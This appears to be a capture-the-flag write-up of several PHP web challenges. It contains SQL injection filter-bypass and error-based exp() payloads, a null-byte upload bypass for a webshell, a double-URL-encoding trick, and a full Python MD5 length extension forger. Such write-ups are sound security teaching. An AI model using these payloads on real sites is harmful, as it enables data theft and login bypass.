PHP trick

http://ctf5.shiyanbar.com/DUTCTF/index.php

Page:
Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Deprecated: Function eregi() is deprecated in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 8

Can you authenticate to this website? index.php.txt

Open index.php.txt:

<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

eregi() does a case-insensitive regex match on $_GET[id]; if "hackerDJ" matches, the page prints "not allowed!" and exits. (The notices at the top come from the unquoted array key: $_GET[id] is treated as an undefined constant that PHP assumes is the string 'id'.)
The bypass has nothing to do with SQL injection. PHP already URL-decodes the query string once when it fills $_GET, and the script then calls urldecode() on the value a second time before the == comparison. So a string that is URL-encoded twice passes the eregi() check on the once-decoded value and only becomes "hackerDJ" after the second decode.
Concretely, %2568ackerDJ is decoded by PHP to %68ackerDJ, which does not match "hackerDJ"; urldecode() then turns %68 into h and the comparison succeeds.

payload:http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%2568ackerDJ
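The two-stage decoding above, as an added example that is not part of the original page: a Python model of the challenge's checks. It assumes PHP's normal behaviour of URL-decoding the query string once when populating $_GET, which the listing does not show but the payload relies on.

```python
import re
from urllib.parse import quote, unquote

# What eregi("hackerDJ", ...) matches: a case-insensitive substring search.
BLOCKED = re.compile("hackerDJ", re.IGNORECASE)


def php_get_param(raw_query_value: str) -> str:
    """First decode: what $_GET['id'] holds after PHP parses the query string
    (assumption about the server, not shown in the challenge source)."""
    return unquote(raw_query_value)


def index_php(raw_query_value: str) -> str:
    """Mirror the challenge logic, starting from the value as it appears in the URL."""
    get_id = php_get_param(raw_query_value)
    if BLOCKED.search(get_id):          # eregi() runs on the once-decoded value
        return "not allowed!"
    get_id = unquote(get_id)            # $_GET[id] = urldecode($_GET[id]); second decode
    if get_id == "hackerDJ":            # == is case-sensitive here
        return "Access granted!"
    return ""                           # page body without the flag


def double_encode_first_char(s: str) -> str:
    """Build the bypass: percent-encode the first byte, then encode the '%' itself.
    'hackerDJ' -> '%68ackerDJ' -> '%2568ackerDJ'."""
    once = "%%%02X" % ord(s[0]) + s[1:]
    return quote(once, safe="")         # quote() turns '%' into '%25', letters pass through


if __name__ == "__main__":
    for candidate in ("hackerDJ", "%68ackerDJ", double_encode_first_char("hackerDJ")):
        print(candidate, "->", index_php(candidate) or "(nothing)")
```

Encoding the string only once is useless: PHP's own decode already turns %68ackerDJ into hackerDJ before eregi() sees it, so only the doubly encoded form gets past the first check.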


Upload bypass

http://ctf5.shiyanbar.com/web/upload

The page is a file upload form. Uploading a one-line PHP webshell (.php) is rejected with a message that only image formats are allowed.
Uploading an image instead is rejected with a message that the extension must be .php.
Common file upload bypasses: changing the case of the extension, special file names, 0x00 (null byte) truncation, and .htaccess attacks.
This challenge is solved with %00 truncation: the name passes the image-extension check as a whole, but the null byte ends the string when the file is written, so only the .php part before it survives. Note that this only works against old PHP builds; PHP 5.3.4 and later reject file paths containing a null byte.


Simple SQL injection

Hint: there is a filter.
http://ctf5.shiyanbar.com/423/web/

Source:

<html>
<head>
<title>1</title>
</head>
<body>
<div style="text-align:center">
<h2>flag<h2>
<h3>到底过滤了什么东西?<h3>
<form action="" method="get">
<input name="id" type="text"/>
<input type="submit" />
</form>

The page source shows the parameter is sent by GET.
id=1 returns name=baloteli.
1' gives an error.
Trying to read the tables: union select is stripped.
With unionunion selectselect the keywords survive; the author also reports the space as filtered.
After a lot of trials: and, union, select, space, from and where are filtered, so each filtered keyword has to be written twice (one copy is removed, the other survives). The echoed queries below still contain spaces, so in practice only the keywords matter.
Use database() to read the current database name through the id parameter:
1' unionunion selectselect database()'
web1 comes back (the database name, echoed as a second row):
ID: 1' union select database()'
name: baloteli
ID: 1' union select database()'
name: web1
Next, the tables.


Reference

In MySQL and Infobright, the tables in the information_schema database are read-only: they cannot be updated, deleted from or inserted into, and cannot carry triggers, because they are really views rather than base tables and have no backing files.
information_schema.tables stores the metadata of every table; the commonly used columns are:
table_schema: the database name;
table_name: the table name;
engine: the storage engine;
table_rows: a rough estimate of the row count;
data_length: the size of the table in bytes;
index_length: the size of the table's indexes;
row_format: shows whether the table is compressed.


Query: 1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1

Two relevant rows come back:
ID: 1’ union select table_name from information_schema.tables where ‘1’=’1
name: admin
ID: 1’ union select table_name from information_schema.tables where ‘1’=’1
name: flag

Then the column names:
1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag
(column_name and information_schema.columns are written with a copy nested inside themselves; neither is on the filter list found above, and the echo shows them unchanged, so that nesting is harmless but not needed.)

ID: 1’ union select column_name from information_schema.columns where table_name=’flag
name: baloteli
ID: 1’ union select column_name from information_schema.columns where table_name=’flag
name: flag
ID: 1’ union select column_name from information_schema.columns where table_name=’flag
name: id

The flag column exists, so query it directly:
1’ unionunion selectselect flag fromfrom flag wherewhere ‘1’=’1

This returns the flag.


Simple SQL injection 2

Hint: the query result is echoed.
http://ctf5.shiyanbar.com/web/index_2.php

Following the approach of the previous challenge: 1 works, 1' gives an error, and 1 ' (with a space) returns "SQLi detected!".
So spaces are filtered.
1' union select table_name from information_schema.tables where '1'='1
Replace every space with the inline comment /**/, which MySQL treats as whitespace:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
This returns the relevant rows:

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: admin
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: flag
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: web_1

Then the column names:
1' union select column_name from information_schema.columns where table_name='flag
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
The flag column shows up:

ID: 1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
name: flag

Query the flag:
1' union select flag from flag where '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
This returns the flag.
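The two filter bypasses above (keyword doubling in "Simple SQL injection", comment-for-space in "Simple SQL injection 2") as one added example, not code from the original page. The page never shows the filters' source, so the two filter functions are constructed models of what the echoed queries imply: the first challenge removes one occurrence of each blacklisted word, the second rejects any input containing a space. The builder uses the nested form (a copy of the keyword inside itself, as in the page's column_namcolumn_namee) because it also survives a filter that strips every occurrence in one pass, which plain doubling does not.

```python
import re

# Words the writeup found stripped in challenge 1 (spaces survived in the echo).
BLACKLIST = ["and", "union", "select", "from", "where"]


def filter1(s: str, strip_all: bool = False) -> str:
    """Model of the challenge-1 filter: delete each blacklisted word, case-insensitively.
    strip_all=True models a str_replace()-style filter that removes every occurrence
    in a single left-to-right pass (no re-scan of the result)."""
    for w in BLACKLIST:
        s = re.sub(re.escape(w), "", s, count=0 if strip_all else 1, flags=re.I)
    return s


def filter2(s: str):
    """Model of the challenge-2 filter: any space means 'SQLi detected!' (None)."""
    return None if " " in s else s


def nest_keyword(word: str) -> str:
    """Put a full copy of the word inside itself: 'select' -> 'selselectect'.
    Removing the inner copy (once, or every non-overlapping match in one pass)
    leaves the original word behind."""
    k = len(word) // 2
    return word[:k] + word + word[k:]


def build_for_filter1(query: str, strip_all: bool = False) -> str:
    """Rewrite a query so that filter1() turns it back into the original query."""
    out = query
    for w in BLACKLIST:
        out = re.sub(re.escape(w), lambda m: nest_keyword(m.group(0)), out,
                     count=0 if strip_all else 1, flags=re.I)
    return out


def build_for_filter2(query: str) -> str:
    """Replace every space with an inline comment; MySQL parses /**/ as whitespace."""
    return query.replace(" ", "/**/")


if __name__ == "__main__":
    q = "1' union select table_name from information_schema.tables where '1'='1"
    print("stripped :", filter1(q))
    print("nested   :", build_for_filter1(q))
    print("survives :", filter1(build_for_filter1(q)))
    print("no spaces:", build_for_filter2(q))
```

The page's own unionunion form relies on the filter removing only the first match; against a remove-all filter it collapses to nothing, while ununionion still leaves union behind.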


Simple SQL injection 3

Hint: MySQL error-based injection.
http://ctf5.shiyanbar.com/web/index_3.php

Entering 1 prints Hello!
Entering 1' produces an error:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\web\index_3.php on line 30
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
The warning names mysql_fetch_array().
Definition: mysql_fetch_array() takes a result resource and returns one row as an associative array, a numeric array, or both; it returns false when no more rows are left. Here the broken query made mysql_query() return false instead of a resource, and that false was passed straight in, which is why both the PHP warning and the raw MySQL error text reach the page.


Ten MySQL error-based injection functions found online:

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));


The first three (floor, extractvalue, updatexml) all return "Don't!", so they are blocked; exp() works.
Database name: 'or EXP(~(SELECT * from(select database())a))#
Output: DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
Table names: 'or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
Output: DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'
Column names: 'or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#
Output: DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'
Flag: 'or EXP(~(SELECT * from(select group_concat(flag) from flag)a))#
This gives the flag:
DOUBLE value is out of range in 'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'
The trick works because ~ applied to the subquery result yields a huge unsigned BIGINT, exp() of that overflows DOUBLE, and the error message echoes the offending expression together with the evaluated subquery. It depends on the server: newer MySQL releases no longer include the expression in this error, so check the version before relying on it.
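The four-step exp() chain above, as an added example that is not the challenge's code: a payload builder plus a parser that pulls the leaked value out of the error text MySQL echoes. Sending the HTTP request is left to the caller (oracle(payload) must return the response body for that id value); the fake_oracle here is a constructed stand-in that replays the responses quoted on the page so the chain runs offline.

```python
import re

# The parser only understands the error format quoted on the page, e.g.
#   DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
LEAK_RE = re.compile(
    r"DOUBLE value is out of range in 'exp\(~\(\(select '([^']*)' from dual\)\)\)'")


def exp_payload(subquery: str) -> str:
    """Wrap a one-value subquery so its result is cast into the overflowing exp() call."""
    return "'or EXP(~(SELECT * from(%s)a))#" % subquery


def extract_leak(body: str):
    """Return the string MySQL echoed inside the overflow error, or None if no leak."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def dump_flag(oracle):
    """Run the writeup's four steps through oracle() and return what each step leaked."""
    db = extract_leak(oracle(exp_payload("select database()")))
    tables = extract_leak(oracle(exp_payload(
        "select group_concat(table_name) from information_schema.tables "
        "where table_schema=database()")))
    columns = extract_leak(oracle(exp_payload(
        "select group_concat(column_name) from information_schema.columns "
        "where table_name='flag'")))
    flag = extract_leak(oracle(exp_payload("select group_concat(flag) from flag")))
    return {
        "database": db,
        "tables": tables.split(",") if tables else [],
        "columns": columns.split(",") if columns else [],
        "flag": flag,
    }


# Constructed stand-in for the target: the four responses copied from the page,
# keyed by the exact payload that produced them. Anything else gets the normal page.
_CANNED = {
    exp_payload("select database()"):
        "DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'",
    exp_payload("select group_concat(table_name) from information_schema.tables "
                "where table_schema=database()"):
        "DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'",
    exp_payload("select group_concat(column_name) from information_schema.columns "
                "where table_name='flag'"):
        "DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'",
    exp_payload("select group_concat(flag) from flag"):
        "DOUBLE value is out of range in "
        "'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'",
}


def fake_oracle(payload: str) -> str:
    """Replays the page's responses; a real oracle would GET index_3.php?id=<payload>."""
    return _CANNED.get(payload, "Hello!")


if __name__ == "__main__":
    print(dump_flag(fake_oracle))
```

Two practical limits: group_concat() is capped by MySQL's group_concat_max_len (1024 bytes by default), so long table or column lists need paging with LIMIT, and a server that prints a generic error page instead of the MySQL text gives this parser nothing, in which case a boolean or time-based approach is needed.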


Let me in

"I'm sure you can get what you want."
Hint: you may want to know what is happening on the server side.
http://ctf5.shiyanbar.com/web/kzhan.php

The page source shows a POST form.
Submit any username and password, capture the request in Burp Suite, and set source=1 in the cookie; the response then includes the server-side source:

<html>
<body>

<pre>
$flag = "XXXXXXXXXXXXXXXXXXXXXXX";
$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!

$username = $_POST["username"];
$password = $_POST["password"];

if (!empty($_COOKIE["getmein"])) {
if (urldecode($username) === "admin" && urldecode($password) != "admin") {
if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) {
echo "Congratulations! You are a registered user.\n";
die ("The flag is ". $flag);
}
else {
die ("Your cookies don't match up! STOP HACKING THIS SITE.");
}
}
else {
die ("You are not an admin! LEAVE.");
}
}

setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));

if (empty($_COOKIE["source"])) {
setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
if ($_COOKIE["source"] != 0) {
echo ""; // This source code is outputted here
}
}
</pre>
<h1>Admins Only!</h1>
<p>If you have the correct credentials, log in below. If not, please LEAVE.</p>
<form method="POST">
Username: <input type="text" name="username"> <br>
Password: <input type="password" name="password"> <br>
<button type="submit">Submit</button>
</form>

</body>
</html>

The goal is a getmein cookie that satisfies
$COOKIE["getmein"] === md5($secret . urldecode($username . $password))
(the listing reads $COOKIE; the check that can actually pass is against $_COOKIE), while the server also hands out
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
on every visit, and $secret is 15 characters long.
MD5 is a Merkle-Damgard hash: the digest is the internal state after the last block. Knowing md5($secret . "adminadmin") and the length of that input (15 + 10 = 25 bytes) is therefore enough to compute md5($secret . "adminadmin" . padding . X) for any X without knowing $secret: load the known digest as the state, which is the state after the first 64-byte block (25 bytes of message plus MD5's own padding of a 0x80 byte, zero bytes up to 56 bytes, and the 64-bit little-endian bit length 200), and keep hashing X from there.
So send username=admin and password = "admin" . padding . X, URL-encoded because the server urldecode()s it and the padding contains 0x80 and NUL bytes. After decoding, $username . $password is "adminadmin" . padding . X, the password is no longer equal to "admin" as the code requires, and getmein is set to the extended hash.

Hash length extension attack
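The forgery described above, as an added example that is not part of the original page: a pure-Python MD5 whose starting state can be set, used to extend the known sample-hash. It assumes the server logic in the listing (a 15-byte secret, sample-hash = md5(secret . "adminadmin"), the password urldecode()d before hashing); the secret value used in demo() is made up so the forgery can be verified offline against a re-implementation of the server's check.

```python
import hashlib
import math
import struct
from urllib.parse import quote, unquote_to_bytes

# MD5 constants: initial state, per-round rotation amounts, sine-derived additive constants.
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]


def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & 0xFFFFFFFF


def _compress(state, block):
    """One MD5 compression of a 64-byte block onto a 4-word state."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & 0xFFFFFFFF
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & 0xFFFFFFFF
    return tuple((x + y) & 0xFFFFFFFF for x, y in zip(state, (a, b, c, d)))


def md5_padding(message_len: int) -> bytes:
    """The bytes MD5 appends to a message of message_len bytes: 0x80, zeros to
    56 mod 64, then the bit length as a little-endian 64-bit integer (the 'glue')."""
    pad = b"\x80" + b"\x00" * ((55 - message_len) % 64)
    return pad + struct.pack("<Q", (message_len * 8) & 0xFFFFFFFFFFFFFFFF)


def md5_resume(state, data: bytes, already_hashed: int) -> str:
    """Continue MD5 from a known state; already_hashed is the number of bytes that
    produced that state (a multiple of 64). Returns the hex digest of the whole message."""
    assert already_hashed % 64 == 0
    msg = data + md5_padding(already_hashed + len(data))
    for off in range(0, len(msg), 64):
        state = _compress(state, msg[off:off + 64])
    return struct.pack("<4I", *state).hex()


def length_extend(known_hex: str, known_len: int, suffix: bytes):
    """Given md5(M) and len(M), return (glue, md5(M + glue + suffix)) without knowing M."""
    state = struct.unpack("<4I", bytes.fromhex(known_hex))
    glue = md5_padding(known_len)
    return glue, md5_resume(state, suffix, known_len + len(glue))


def forge_login(sample_hash: str, secret_len: int = 15, suffix: bytes = b"x"):
    """Build the POST fields and getmein cookie for the challenge from sample-hash."""
    known_len = secret_len + len(b"adminadmin")
    glue, getmein = length_extend(sample_hash, known_len, suffix)
    # The server urldecode()s the password, so the raw glue bytes are sent URL-encoded.
    # After decoding it is "admin" + glue + suffix, which is != "admin" as required.
    password = quote(b"admin" + glue + suffix, safe="")
    return {"username": "admin", "password": password, "getmein": getmein}


def server_check(secret: bytes, fields) -> bool:
    """The server's cookie check, re-implemented here only to validate the forgery."""
    decoded = unquote_to_bytes(fields["username"] + fields["password"])
    return fields["getmein"] == hashlib.md5(secret + decoded).hexdigest()


def demo(secret: bytes = b"s3cr3t_15_bytes") -> bool:
    """Offline check with a made-up 15-byte secret: compute sample-hash as the server
    would, forge the login without using the secret, then verify with the server logic."""
    sample_hash = hashlib.md5(secret + b"adminadmin").hexdigest()
    return server_check(secret, forge_login(sample_hash))


if __name__ == "__main__":
    print("forgery accepted:", demo())
```

Against the live challenge the only inputs are the sample-hash cookie and the secret's length; the forged getmein cookie goes in the request alongside the POSTed username and URL-encoded password. The same construction applies to any "md5(secret || data)" check, which is why such tokens should use HMAC instead.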


This looks a bit easy!

http://ctf5.shiyanbar.com/8/index.php?id=1

Entering 1' gives the error: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\8\index.php on line 35
and 1=1 returns normally, and 1=2 returns an empty result: the parameter is injectable.
order by 1,2 works, order by 3 errors: the query returns two columns.
Database: and 1=2 union select 1,database() gives my_db
Version: and 1=2 union select 1,version() gives 5.5.47
Tables: and 1=2 union select 1,table_name from information_schema.tables lists news, thiskey and admin as the relevant table names
Columns: and 1=2 union select 1,column_name from information_schema.columns where table_schema='my_db' and table_name='thiskey' gives the column k0y
Flag: and 1=2 union select 1,k0y from thiskey


Summary of the above

For challenges that hint at SQL injection:

  1. and 1=1 / and 1=2: check whether the parameter is injectable (and order by N to count the columns)
  2. Database name: and 1=2 union select 1,database()
  3. Database version: and 1=2 union select 1,version()
  4. Tables: and 1=2 union select 1,table_name from information_schema.tables
  5. Columns: and 1=2 union select 1,column_name from information_schema.columns where table_schema='' and table_name=''
  6. Flag: and 1=2 union select 1,<column> from <table>